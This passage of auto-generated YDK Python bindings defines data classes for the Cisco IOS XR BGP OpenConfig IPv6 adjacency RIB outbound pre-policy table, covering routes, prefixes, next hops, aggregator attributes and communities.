    table_entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost']
    return table_entry['meta_info']
class AdjRibOutPre(_Entity_):
"""
Adjacency rib out\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3 compatible super() call for a deeply nested class.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre, self).__init__()
    # YANG schema bookkeeping used by YDK path resolution.
    self.yang_name = "adj-rib-out-pre"
    self.yang_parent_name = "open-config-neighbor"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers: yang segment name -> (python attribute, binding class).
    self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes))])
    self._leafs = OrderedDict()
    # Eagerly instantiate child containers and link them back to this node.
    self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes()
    self.routes.parent = self
    self._children_name_map["routes"] = "routes"
    self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes()
    self.num_routes.parent = self
    self._children_name_map["num_routes"] = "num-routes"
    self._segment_path = lambda: "adj-rib-out-pre"
    # Freeze: from here on, attribute writes are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK's validating setter (no leafs on this node)."""
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre,
        [],
        name,
        value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3 compatible super() call for a deeply nested class.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes, self).__init__()
    # YANG schema bookkeeping used by YDK path resolution.
    self.yang_name = "routes"
    self.yang_parent_name = "adj-rib-out-pre"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child list entries: yang segment name -> (python attribute, binding class).
    self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route))])
    self._leafs = OrderedDict()
    # YANG list "route" is modeled as a YList of Route entries.
    self.route = YList(self)
    self._segment_path = lambda: "routes"
    # Freeze: from here on, attribute writes are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK's validating setter (no leafs on this node)."""
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes,
        [],
        name,
        value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3 compatible super() call for a deeply nested class.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route, self).__init__()
    # YANG schema bookkeeping used by YDK path resolution.
    self.yang_name = "route"
    self.yang_parent_name = "routes"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Keyless YANG list entry: no key leaf names.
    self.ylist_key_names = []
    # Child containers: yang segment name -> (python attribute, binding class).
    self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved))])
    # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
    # 'route' and 'neighbor_address' are unions of two string patterns (v4/v6).
    self._leafs = OrderedDict([
        ('route', (YLeaf(YType.str, 'route'), ['str','str'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
        ('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
        ('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
    ])
    self.route = None
    self.neighbor_address = None
    self.path_id = None
    self.valid_route = None
    self.invalid_reason = None
    self.best_path = None
    # Eagerly instantiate child containers and link them back to this node.
    self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName()
    self.prefix_name.parent = self
    self._children_name_map["prefix_name"] = "prefix-name"
    self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList()
    self.route_attr_list.parent = self
    self._children_name_map["route_attr_list"] = "route-attr-list"
    self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList()
    self.ext_attributes_list.parent = self
    self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
    self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate()
    self.last_modified_date.parent = self
    self._children_name_map["last_modified_date"] = "last-modified-date"
    self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved()
    self.last_update_recieved.parent = self
    self._children_name_map["last_update_recieved"] = "last-update-recieved"
    self._segment_path = lambda: "route"
    # Freeze: from here on, attribute writes are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK's validating setter (honors the freeze flag)."""
    leaf_names = ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path']
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route,
        leaf_names,
        name,
        value)
class PrefixName(_Entity_):
    """
    Prefix
    .. attribute:: prefix
    Prefix
    **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix>`
    **config**\: False
    .. attribute:: prefix_length
    Prefix length
    **type**\: int
    **range:** 0..255
    **config**\: False
    """

    # YANG module prefix and revision this generated binding was built from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call for a deeply nested class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, self).__init__()
        # YANG schema bookkeeping used by YDK path resolution.
        self.yang_name = "prefix-name"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers: yang segment name -> (python attribute, binding class).
        self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix))])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
        ])
        self.prefix_length = None
        # Eagerly instantiate the child container and link it back to this node.
        self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"
        self._segment_path = lambda: "prefix-name"
        # Freeze: from here on, attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, ['prefix_length'], name, value)

    class Prefix(_Entity_):
        """
        Prefix
        .. attribute:: afi
        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False
        .. attribute:: ipv4_address
        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: ipv6_address
        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """

        # YANG module prefix and revision this generated binding was built from.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # Python 2/3 compatible super() call for a deeply nested class.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, self).__init__()
            # YANG schema bookkeeping used by YDK path resolution.
            self.yang_name = "prefix"
            self.yang_parent_name = "prefix-name"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "prefix"
            # Freeze: from here on, attribute writes are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
    """
    RouteAttributesList
    .. attribute:: next_hop
    NextHopAddress
    **type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop>`
    **config**\: False
    .. attribute:: aggregrator_attributes
    AggregatorList
    **type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes>`
    **config**\: False
    .. attribute:: origin_type
    Origin Attribute Type
    **type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
    **config**\: False
    .. attribute:: as_path
    AS Path
    **type**\: str
    **config**\: False
    .. attribute:: as4_path
    AS4 Path
    **type**\: str
    **config**\: False
    .. attribute:: med
    Med
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: local_pref
    LocalPref
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: atomic_aggr
    AtomicAggr
    **type**\: bool
    **config**\: False
    .. attribute:: community
    CommunityArray
    **type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community>`
    **config**\: False
    """

    # YANG module prefix and revision this generated binding was built from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call for a deeply nested class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, self).__init__()
        # YANG schema bookkeeping used by YDK path resolution.
        self.yang_name = "route-attr-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers/lists: yang segment name -> (python attribute, binding class).
        self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community))])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
            ('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
            ('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
            ('med', (YLeaf(YType.uint32, 'med'), ['int'])),
            ('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
            ('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
        ])
        self.origin_type = None
        self.as_path = None
        self.as4_path = None
        self.med = None
        self.local_pref = None
        self.atomic_aggr = None
        # Eagerly instantiate child containers and link them back to this node.
        self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop()
        self.next_hop.parent = self
        self._children_name_map["next_hop"] = "next-hop"
        self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes()
        self.aggregrator_attributes.parent = self
        self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
        # YANG list "community" is modeled as a YList of Community entries.
        self.community = YList(self)
        self._segment_path = lambda: "route-attr-list"
        # Freeze: from here on, attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)

    class NextHop(_Entity_):
        """
        NextHopAddress
        .. attribute:: afi
        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False
        .. attribute:: ipv4_address
        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: ipv6_address
        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """

        # YANG module prefix and revision this generated binding was built from.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # Python 2/3 compatible super() call for a deeply nested class.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, self).__init__()
            # YANG schema bookkeeping used by YDK path resolution.
            self.yang_name = "next-hop"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "next-hop"
            # Freeze: from here on, attribute writes are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop']['meta_info']

    class AggregratorAttributes(_Entity_):
        """
        AggregatorList
        .. attribute:: as_
        AS number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: as4
        AS4 number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: address
        IPv4 address
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """

        # YANG module prefix and revision this generated binding was built from.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # Python 2/3 compatible super() call for a deeply nested class.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
            # YANG schema bookkeeping used by YDK path resolution.
            self.yang_name = "aggregrator-attributes"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Leaf registry; 'as_' carries a trailing underscore because 'as'
            # is a Python keyword (YANG leaf name is still 'as').
            self._leafs = OrderedDict([
                ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
                ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
                ('address', (YLeaf(YType.str, 'address'), ['str'])),
            ])
            self.as_ = None
            self.as4 = None
            self.address = None
            self._segment_path = lambda: "aggregrator-attributes"
            # Freeze: from here on, attribute writes are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']

    class Community(_Entity_):
        """
        CommunityArray
        .. attribute:: objects
        BGP OC objects
        **type**\: str
        **config**\: False
        """

        # YANG module prefix and revision this generated binding was built from.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # Python 2/3 compatible super() call for a deeply nested class.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, self).__init__()
            # YANG schema bookkeeping used by YDK path resolution.
            self.yang_name = "community"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "community"
            # Freeze: from here on, attribute writes are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
